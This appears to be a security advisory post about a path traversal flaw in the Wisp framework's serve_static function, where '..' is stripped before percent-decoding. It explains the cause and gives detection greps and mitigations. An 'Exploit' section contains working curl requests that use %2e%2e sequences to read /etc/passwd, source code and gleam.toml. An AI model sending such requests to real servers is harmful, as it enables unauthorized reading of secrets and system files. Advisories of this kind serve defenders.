Listen to this Post
The vulnerability exists in the `wisp.serve_static` function, which processes file paths for static file serving. The function sanitizes the request path by removing literal `..` sequences, but does so before decoding percent-encoded characters. This order allows an attacker to encode the directory traversal sequence as %2e%2e. The sanitization step leaves `%2e%2e` unchanged because it only looks for literal ... Later, percent decoding converts `%2e%2e` to ... The operating system then interprets the decoded `..` as a parent directory specifier, enabling the attacker to escape the static file directory and read arbitrary files. An unauthenticated attacker can exploit this in a single HTTP request, gaining access to sensitive files the application process has read permissions for, such as application source code, configuration files, secrets, and system files. The issue affects all Wisp versions from 2.1.1 up to, but not including, 2.2.1.
dailycve form:
Platform: Wisp (gleam-wisp)
Version: 2.1.1 – 2.2.0
Vulnerability: Path Traversal
Severity: High (8.7)
date: 2026-03-10
Prediction: Patch expected 2026-03-11
Analytics
What Undercode Say:
Vulnerability pattern detection grep -r "string.replace..." src/wisp.gleam grep -A5 "uri.percent_decode" src/wisp.gleam Check if vulnerable function is used grep -r "wisp.serve_static" . Monitor for exploit attempts in logs grep "%2e%2e" /var/log/nginx/access.log
Exploit:
Read /etc/passwd curl -s --path-as-is "http://localhost:8080/static/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" Read application source curl -s --path-as-is "http://localhost:8080/static/%2e%2e/%2e%2e/src/app.gleam" Read configuration curl -s --path-as-is "http://localhost:8080/static/%2e%2e/%2e%2e/gleam.toml"
Protection from this CVE:
- Upgrade to Wisp version 2.2.1 or later, which implements fixed code with proper sanitization after percent-decoding.
- If upgrading is not possible, apply the patch from commit 161118c431047f7ef1ff7cabfcc38981877fdd93.
- As a workaround, copy the fixed `serve_static` implementation into your codebase and replace references.
- Implement web application firewall (WAF) rules to block requests containing
%2e%2e. - Avoid exposing the vulnerable `wisp.serve_static` function to untrusted users.
Impact:
Arbitrary file read allowing an unauthenticated attacker to access application source code, configuration files (including secrets, private keys, `.env` files), and system files (e.g., /etc/passwd, /etc/shadow). This information disclosure can lead to further attacks, compromise of sensitive data, and complete system compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

